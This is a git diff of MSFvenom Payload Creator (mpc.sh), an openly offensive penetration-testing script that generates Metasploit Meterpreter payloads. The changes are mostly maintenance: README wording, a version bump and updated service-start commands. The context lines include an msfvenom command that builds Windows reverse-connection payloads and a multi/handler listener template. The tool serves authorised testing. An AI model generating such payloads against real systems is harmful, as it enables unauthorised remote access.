diff --git a/README.md b/README.md index 70e6b70..a932aaf 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). +A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework). ![Msfvenom Payload Creator (MPC)](https://i.imgur.com/JwSYBRZ.png) @@ -18,7 +18,7 @@ The only necessary input from the user should be **defining the payload** they w * **Want to generate one of each payload? No issue!** Try: `loop`. * **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)! -_Note: This will **not** try to bypass any anti-virus solutions._ +_Note: This will **not** try to bypass any anti-virus solutions in any modes._ ## Install diff --git a/mpc.sh b/mpc.sh old mode 100755 new mode 100644 index 70e3ffd..cd6725a --- a/mpc.sh +++ b/mpc.sh @@ -1,12 +1,12 @@ #!/bin/bash #-Metadata----------------------------------------------------# -# Filename: mpc.sh (v1.3.2) (Update: 2015-08-17) # +# Filename: mpc.sh (v1.3.3) (Update: 2015-11-06) # #-Info--------------------------------------------------------# # Quickly generate Metasploit payloads using msfvenom. # #-Author(s)---------------------------------------------------# # g0tmilk ~ https://blog.g0tmi1k.com/ # #-Operating System--------------------------------------------# -# Designed for & tested on: Kali Linux & Metasploit v4.11+ # +# Designed for & tested on: Kali Linux 2 & Metasploit v4.11+ # #-Licence-----------------------------------------------------# # MIT License ~ http://opensource.org/licenses/MIT # #-Notes-------------------------------------------------------# @@ -141,7 +141,7 @@ function doAction { cat < "${FILEHANDLE}" # -# RUN: service postgresql start;service metasploit start; msfconsole -q -r "${FILENAME}" +# RUN: systemctl start postgresql; msfdb start; msfconsole -q -r "${FILEHANDLE}" # use exploit/multi/handler set PAYLOAD ${PAYLOAD} @@ -715,16 +715,16 @@ elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" ]]; t CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'" doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" -# Batch/Loop modes +## Batch/Loop modes elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then #SUCCESS=true exit 0 -# Blank input +## Blank input elif [[ -z "${TYPE}" ]]; then echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}" -# Unexected input +## Unexpected input else echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2 fi